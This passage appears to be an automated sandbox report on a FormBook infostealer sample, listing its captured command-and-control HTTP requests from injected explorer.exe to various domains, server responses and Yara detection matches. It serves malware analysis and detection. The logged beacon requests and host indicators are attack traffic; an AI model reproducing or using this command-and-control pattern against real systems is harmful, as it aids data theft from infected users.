                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:13 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 138
                                                                                                                        Connection: close
                                                                                                                        Location: http://www.ivoirepneus.com
                                                                                                                        X-IPLB-Instance: 16978
                                                                                                                        Set-Cookie: SERVERID77446=200178|YNIO7|YNIO7; path=/
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        3192.168.2.64975934.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:18.311331034 CEST5617OUTGET /dy8g/?A4Ll=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.extinctionbrews.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:18.451875925 CEST5618INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:18 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60c7be46-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        4192.168.2.64976034.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:23.578876019 CEST5619OUTGET /dy8g/?6l-=6lY0&A4Ll=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o1L2qAF92htTMNNUg== HTTP/1.1
                                                                                                                        Host: www.cindywillardrealtor.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:23.719109058 CEST5619INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:23 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60c7be46-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        5192.168.2.649761169.62.77.15880C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:29.144289017 CEST5620OUTGET /dy8g/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.doityourselfism.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:29.339704037 CEST5621INHTTP/1.1 302 Found
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:29 GMT
                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 mod_apreq2-20090110/2.8.0 mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                        Location: http://ww1.doityourselfism.com/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY0
                                                                                                                        Content-Length: 310
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 31 2e 64 6f 69 74 79 6f 75 72 73 65 6c 66 69 73 6d 2e 63 6f 6d 2f 3f 41 34 4c 6c 3d 59 34 4a 42 66 42 6a 42 4b 4d 47 7a 62 55 7a 72 4e 75 2b 41 52 4c 4b 34 5a 51 61 62 2b 64 61 70 31 6b 71 34 30 59 53 76 71 53 7a 79 4a 2f 6d 66 52 67 34 55 39 2b 4c 7a 31 65 4b 4a 66 52 4c 4b 33 63 41 6d 61 61 30 62 6b 77 3d 3d 26 61 6d 70 3b 36 6c 2d 3d 36 6c 59 30 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://ww1.doityourselfism.com/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&amp;6l-=6lY0">here</a>.</p></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        6192.168.2.649766172.67.129.3380C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:39.828190088 CEST5640OUTGET /dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.builtbydawn.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:39.894753933 CEST5641INHTTP/1.1 301 Moved Permanently
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:39 GMT
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=3600
                                                                                                                        Expires: Tue, 22 Jun 2021 17:25:39 GMT
                                                                                                                        Location: https://www.builtbydawn.com/dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0
                                                                                                                        cf-request-id: 0ad623bf16000032447085d000000001
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=4LSx3QPsSWq1uFYqrGXbf8LvK1fi%2FqXets7CKG0Y5i4lubM%2FgteHR997gQM%2Fu7raxmn7xfaolxGhWAY%2BOTOcGXlJL4wtWIlhfMZa30mFTKXBc%2FKatV97PIcqd6Ev1fr0Ow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 6636d5782cbf3244-FRA
                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        7192.168.2.649767166.88.88.17680C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:45.192420959 CEST5643OUTGET /dy8g/?6l-=6lY0&A4Ll=rxSGsMlf+TpCm2paceR4OA9vkYPhboYZiWSl1OoSBIXvvwNRDuCI148weh0JxST9QqctWF9UAQ== HTTP/1.1
                                                                                                                        Host: www.qq66520.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:45.386563063 CEST5644INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:45 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 4861
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d7 f1 d2 e5 d2 d3 c9 d5 b5 e7 d7 d3 c9 cc ce f1 d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 33 35 36 37 3b 26 23 31 39 39 39 36 3b 26 23 33 35 31 39 39 3b 26 23 32 35 31 36 35 3b 26 23 31 39 39 36 38 3b 26 23 32 36 36 38 31 3b 26 23 32 35 31 36 33 3b 26 23 32 35 33 35 31 3b 26 23 32 33 36 30 31 3b 26 23 32 31 38 39 38 3b 26 23 33 30 31 34 30 3b 26 23 32 30 31 30 32 3b 26 23 39 35 3b 26 23 32 33 35 36 37 3b 26 23 31 39 39 39 36 3b 26 23 33 35 31 39 39 3b 26 23 32 30 33 32 30 3b 26 23 32 36 31 35 39 3b 26 23 31 39 39 38 31 3b 26 23 32 36 31 35 39 3b 26 23 32 37 34 32 34 3b 26 23 39 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 38 34 30 35 3b 26 23 33 35 38 33 35 3b 26 23 39 35 3b 26 23 32 31 34 34 38 3b 26 23 32 32 39 30 39 3b 26 23 32 39 36 30 39 3b 26 23 32 31 34 34 38 3b 26 23 32 30 38 36 39 3b 26 23 32 33 33 38 34 3b 26 23 32 33 35 36 37 3b 26 23 33 30 33 34 30 3b 26 23 32 33 35 36 37 3b 26 23 34 30 36 34 34 3b 26 23 32 37 38 33 33 3b 26 23 32 38 32 31 36 3b 26 23 32 35 31 30 33 3b 26 23 39 35 3b 26 23 32 35 31 30 34 3b 26 23 32 34 31 38 30 3b 26 23 32 32 38 39 39 3b 26 23 32 30 31 35 34 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 39 35 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 34 35 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 34 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 33 35 36 37 3b 26 23 31 39 39 39 36 3b 26 23 33 35 31 39 39 3b 26 23 32 35 31 36 35 3b 26 23 31 39 39 36 38 3b 26 23 32 36 36 38 31 3b 26 23 32 35 31 36 33 3b 26 23 32 35 33 35 31 3b 26 23 32 33 36 30 31 3b 26 23 32 31 38 39 38 3b 26 23 33 30 31 34 30 3b 26 23 32 30 31 30 32 3b 26 23 39 35 3b 26 23 32 33 35 36 37 3b 26 23 31 39 39 39 36 3b 26 23 33 35 31 39 39 3b 26 23 32 30 33 32 30 3b 26 23 32 36 31 35 39 3b 26 23 31 39 39 38 31 3b 26 23 32 36 31 35 39 3b 26 23 32 37 34 32 34 3b 26 23 39 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 38 34 30 35 3b 26 23 33 35 38 33 35 3b 26 23 39 35 3b 26 23 32 31 34 34 38 3b 26 23 32 32 39 30 39 3b 26 23 32 39 36 30 39 3b 26 23 32 31 34 34 38 3b 26 23 32 30 38 36 39 3b 26 23 32 33 33 38 34 3b 26 23 32 33 35 36 37 3b 26 23 33 30 33 34 30 3b 26 23 32 33 35 36 37 3b 26 23 34 30 36 34 34 3b 26 23 32 37 38 33 33 3b 26 23 32 38 32 31 36 3b 26 23 32 35 31 30 33 3b 26 23 39 35 3b 26 23 32 35 31 30 34 3b 26 23 32 34 31 38 30 3b 26 23 32 32 38 39 39 3b 26 23 32 30 31 35 34 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 39 35 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 34 35 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 34 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34
                                                                                                                        Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#23567;&#19996;&#35199;&#25165;&#19968;&#26681;&#25163;&#25351;&#23601;&#21898;&#30140;&#20102;&#95;&#23567;&#19996;&#35199;&#20320;&#26159;&#19981;&#26159;&#27424;&#99;&#20813;&#36153;&#38405;&#35835;&#95;&#21448;&#22909;&#29609;&#21448;&#20869;&#23384;&#23567;&#30340;&#23567;&#40644;&#27833;&#28216;&#25103;&#95;&#25104;&#24180;&#22899;&#20154;&#20813;&#36153;&#35270;&#39057;&#25773;&#25918;&#55;&#55;&#55;&#55;&#95;&#26085;&#26412;&#19981;&#21345;&#19968;&#21345;&#20108;&#21345;&#22312;&#32447;&#35266;&#30475;</title><meta name="keywords" content="&#23567;&#19996;&#35199;&#25165;&#19968;&#26681;&#25163;&#25351;&#23601;&#21898;&#30140;&#20102;&#95;&#23567;&#19996;&#35199;&#20320;&#26159;&#19981;&#26159;&#27424;&#99;&#20813;&#36153;&#38405;&#35835;&#95;&#21448;&#22909;&#29609;&#21448;&#20869;&#23384;&#23567;&#30340;&#23567;&#40644;&#27833;&#28216;&#25103;&#95;&#25104;&#24180;&#22899;&#20154;&#20813;&#36153;&#35270;&#39057;&#25773;&#25918;&#55;&#55;&#55;&#55;&#95;&#26085;&#26412;&#19981;&#21345;&#19968;&#21345;&#20108;&#21345;&#22312;&#3244
                                                                                                                        Jun 22, 2021 18:25:45.386607885 CEST5645INData Raw: 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 32 30 30 38 31 3b 26 23 33 32 37 36 39 3b 26 23 32 32 39 31 39 3b 26 23 32 32 38 39 39
                                                                                                                        Data Ascii: 7;&#35266;&#30475;,&#20013;&#25991;&#23383;&#24149;&#20081;&#32769;&#22919;&#22899;&#35270;&#39057;,&#26080;&#32764;&#20044;&#24651;&#27597;&#24615;&#28459;&#30011;&#22823;&#20840;,&#51;&#53;&#100;&#105;&#114;" /><meta name="description" con
                                                                                                                        Jun 22, 2021 18:25:45.386637926 CEST5647INData Raw: 39 30 32 39 3b 2c 26 23 32 35 37 32 30 3b 26 23 33 32 36 35 34 3b 26 23 32 32 38 39 39 3b 26 23 32 30 38 36 39 3b 26 23 33 37 30 39 36 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75
                                                                                                                        Data Ascii: 9029;,&#25720;&#32654;&#22899;&#20869;&#37096;&#35270;&#39057;" /><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /></head><body><style type="text/css">*{margin:0;padding:0;list-style-type:none}a,img{border:0}body
                                                                                                                        Jun 22, 2021 18:25:45.386665106 CEST5648INData Raw: 6e 3e d5 fd 3c 2f 73 70 61 6e 3e 0d 0a 20 20 3c 73 70 61 6e 3e d4 da 3c 2f 73 70 61 6e 3e 0d 0a 20 20 3c 73 70 61 6e 3e c9 ee 3c 2f 73 70 61 6e 3e 0d 0a 20 20 3c 73 70 61 6e 3e c8 eb 3c 2f 73 70 61 6e 3e 0d 0a 20 20 3c 73 70 61 6e 3e bc d3 3c 2f
                                                                                                                        Data Ascii: n></span> <span></span> <span></span> <span></span> <span></span> <span></span> <span></span> <span>.</span> <span>.</span> <span>.</span></h1><div class="progress-bar"></div><script>var letters


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        8192.168.2.64976852.79.124.17380C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:51.038847923 CEST5649OUTGET /dy8g/?A4Ll=GqSDmzIjGNxp2FecVmHvyCO88qwvtjnKiC416l48PhUYnL/NIW7nDNxc91PxOE41cEyZFixE4g==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.mzyxi-rkah-y.net
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:51.324237108 CEST5649INHTTP/1.1 301 Moved Permanently
                                                                                                                        Server: awselb/2.0
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:51 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 134
                                                                                                                        Connection: close
                                                                                                                        Location: https://www.mzyxi-rkah-y.net:443/dy8g/?A4Ll=GqSDmzIjGNxp2FecVmHvyCO88qwvtjnKiC416l48PhUYnL/NIW7nDNxc91PxOE41cEyZFixE4g==&6l-=6lY0
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        9192.168.2.64977175.2.81.22180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:26:06.599775076 CEST5667OUTGET /dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w== HTTP/1.1
                                                                                                                        Host: www.thenorthgoldline.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:26:06.760885954 CEST5668INHTTP/1.1 403 Forbidden
                                                                                                                        Date: Tue, 22 Jun 2021 16:26:06 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 146
                                                                                                                        Connection: close
                                                                                                                        Server: nginx
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Code Manipulations

                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Click to jump to process

                                                                                                                        Memory Usage

                                                                                                                        Click to jump to process

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        Analysis Process: PQMW0W5h3X.exe PID: 6528 Parent PID: 6056

                                                                                                                        General

                                                                                                                        Start time:18:24:06
                                                                                                                        Start date:22/06/2021
                                                                                                                        Path:C:\Users\user\Desktop\PQMW0W5h3X.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\PQMW0W5h3X.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:205167 bytes
                                                                                                                        MD5 hash:6B26DB585F40E14B00B5ADDA57E595DD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: PQMW0W5h3X.exe PID: 6608 Parent PID: 6528

                                                                                                                        General

                                                                                                                        Start time:18:24:07
                                                                                                                        Start date:22/06/2021
                                                                                                                        Path:C:\Users\user\Desktop\PQMW0W5h3X.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\PQMW0W5h3X.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:205167 bytes
                                                                                                                        MD5 hash:6B26DB585F40E14B00B5ADDA57E595DD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
